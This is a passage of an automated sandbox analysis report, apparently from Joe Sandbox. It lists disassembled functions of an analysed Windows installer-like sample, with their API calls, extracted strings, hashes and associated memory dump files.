                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                    • String ID:
                                                                                    • API String ID: 351091851-0
                                                                                    • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction ID: b9c2064567b20e793381e804e5bc2438c092fd9c167849d7407d8daf0e01c371
                                                                                    • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                                    • Instruction Fuzzy Hash: 1951CA75A006299BCB22DB99D9C1BDDB3FCAF4C304F8041DAE509E7211D634AF858F69
                                                                                    Function 00646274 Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00646290
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0064F22D,00000000,0064FB5F), ref: 006462BF
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006462D4
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 006462FB
                                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00646314
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00646335
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID:
                                                                                    • API String ID: 3609083571-0
                                                                                    • Opcode ID: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
                                                                                    • Instruction ID: 4dd900cc12852a0d25872cc702cb4c4dd59defd6bf464013fc66fcb0f6f5a345
                                                                                    • Opcode Fuzzy Hash: 56e9fd127e5b8df3264884d8cb962e5cf8db3fc3bd665bacd5c80e76b0042ab2
                                                                                    • Instruction Fuzzy Hash: F0112E35344701BFCB00DB68DD91FD237E9AB1A355F0452A5F645DB3B2CAB8E8809B44
                                                                                    Function 00404850 Relevance: 9.1, APIs: 6, Instructions: 51fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00404872
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 00404878
                                                                                    • GetStdHandle.KERNEL32(000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00404897
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 0040489D
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 004048B4
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,004039C0,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 004048BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3320372497-0
                                                                                    • Opcode ID: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
                                                                                    • Instruction ID: 9db4a11d59ebcb307a3cfeeab30a2223b0d8a9ead0fdef3697f8df52dc81456b
                                                                                    • Opcode Fuzzy Hash: 4a542bbfe69cf2b8d6e1af26e7d435816e64742c81cc072ed4eb12002cc2b380
                                                                                    • Instruction Fuzzy Hash: 3C01A9E26053103EF610FB6A9D86F5B2ADC8B4576AF10463B7218F31D2C9389D44937E
                                                                                    Function 00403F88 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA,005B1257), ref: 0040403F
                                                                                    • Sleep.KERNEL32(0000000A,00000000,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C,?,004271AA), ref: 00404055
                                                                                    • Sleep.KERNEL32(00000000,?,-00000004,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C), ref: 00404083
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,-00000004,0000001B,00404828,02683360,0040726E,0040760F,?,00000000,02683360,004072DD,00000000,00000220,0042715C), ref: 00404099
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction ID: f1ec43ae1c30d41b10cc41b48195bce38923192b9b407a0b5587fa379d4d1d3c
                                                                                    • Opcode Fuzzy Hash: aa65c037b8b16099025df41b79eb0bd70fabd568e44aaae4c7f43dd737f2b1a1
                                                                                    • Instruction Fuzzy Hash: 1FC136B2A002618FC715CF69E884316BFE5ABC5311F0882BFE555AB3D1C3B8DA41DB94
                                                                                    Function 00600B6C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 239windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600BE9
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00600C10
                                                                                    • SetForegroundWindow.USER32(?), ref: 00600C21
                                                                                    • DefWindowProcW.USER32(?,?,?,?,00000000,00600EE8,?,00000000,00600F26), ref: 00600ED3
                                                                                    Strings
                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00600D5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostWindow$ForegroundProc
                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                    • API String ID: 602442252-3182603685
                                                                                    • Opcode ID: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction ID: ab36fd57ef67da6a4d73ccec4cc41cbfff4955b2beb65bb6a2c22b7cd4e29d0d
                                                                                    • Opcode Fuzzy Hash: 3fce2995ff52617cc64c320909660141712ed5c555b9955e6d286241251052a9
                                                                                    • Instruction Fuzzy Hash: 65911134644204AFE719DF58CD61F9ABBBAEB89700F1584AAF804AB3E1C675AD40CF14
                                                                                    Function 00407BAA Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,00000000), ref: 00407C7E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@$iB
                                                                                    • API String ID: 3192549508-2475287703
                                                                                    • Opcode ID: 626a379a1801ecfc05b34fbfd2420f4cb3f5b81a3a160e2aedf08c5b78c8ff59
                                                                                    • Instruction ID: 9b8732aad967581ee1cfddc98b064603106c7b26d23cb4f63de0fa6512a07937
                                                                                    • Opcode Fuzzy Hash: 626a379a1801ecfc05b34fbfd2420f4cb3f5b81a3a160e2aedf08c5b78c8ff59
                                                                                    • Instruction Fuzzy Hash: 3C417F71A0C2059FE720DF14D884B2BB7A5EF94314F15856AE549AB3D1C738FC82CB6A
                                                                                    Function 005F89FC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: .tmp$_iu$jd
                                                                                    • API String ID: 3498533004-1802150322
                                                                                    • Opcode ID: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction ID: 3061496996edbf0f295552ba256b7f5cd8ef57c15fc1c95d12c7dd96c3447177
                                                                                    • Opcode Fuzzy Hash: a0223c2dfc578305c0dddc432aeb03b296bc242cc522b57ea9052b2c607b4f5e
                                                                                    • Instruction Fuzzy Hash: 9C31A430A4021DABDB10EBA5C846BEEBBB4FF45314F10417AF640B72D2DA786E059758
                                                                                    Function 005A3AB4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 103timethreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005A3A28: GetCursorPos.USER32 ref: 005A3A2F
                                                                                    • SetTimer.USER32 ref: 005A3B9F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A3BD9
                                                                                    • WaitMessage.USER32(00000000,005A3C1D,?,?,?,00000000), ref: 005A3BFD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentCursorMessageThreadTimerWait
                                                                                    • String ID: $/Z$D0f
                                                                                    • API String ID: 3909455694-26430867
                                                                                    • Opcode ID: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
                                                                                    • Instruction ID: e22e41007f1cd188d3129f5814c38c56834451e257cf5d477a750d23bbd2f832
                                                                                    • Opcode Fuzzy Hash: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
                                                                                    • Instruction Fuzzy Hash: F4415E30A04248EFDB51DFA8D896B9DBBF6FB46318F5584A9F804A7291C7B45F44CB20
                                                                                    Function 00650308 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006505BC,?,?,00000000), ref: 0065034E
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                      • Part of subcall function 00421594: SetCurrentDirectoryW.KERNEL32(00000000,?,00650376,00000000,00650583,?,?,00000005,00000000,006505BC,?,?,00000000), ref: 0042159F
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction ID: f4c181762cbf351847136a24d252f6132ab9ebf6a138c6ef489f4fabac20360c
                                                                                    • Opcode Fuzzy Hash: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction Fuzzy Hash: 5A416F34A006099FD700EFA8CD569AEBFB6FB89300F508465F900B7791DA75AE05DF51
                                                                                    Function 0064449C Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644527
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644530
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                    • API String ID: 1375471231-2952887711
                                                                                    • Opcode ID: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction ID: 8551b8634482954e3fd0c2332de757f57d69561d22e1e83ac04cf94fc86de4b6
                                                                                    • Opcode Fuzzy Hash: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction Fuzzy Hash: 29411074A001099BDB04EFA5D886ADEB7B7EF89304F50417AF400B7392DE74AE05CB69
                                                                                    Function 0065C4A4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0040EC94: GetModuleHandleW.KERNEL32(00000000,?,0065C4B7), ref: 0040ECA0
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0065C4C7
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0065C4E3
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0065C528), ref: 0065C4F8
                                                                                      • Part of subcall function 00651170: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 005A2F2C: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005A2F51
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
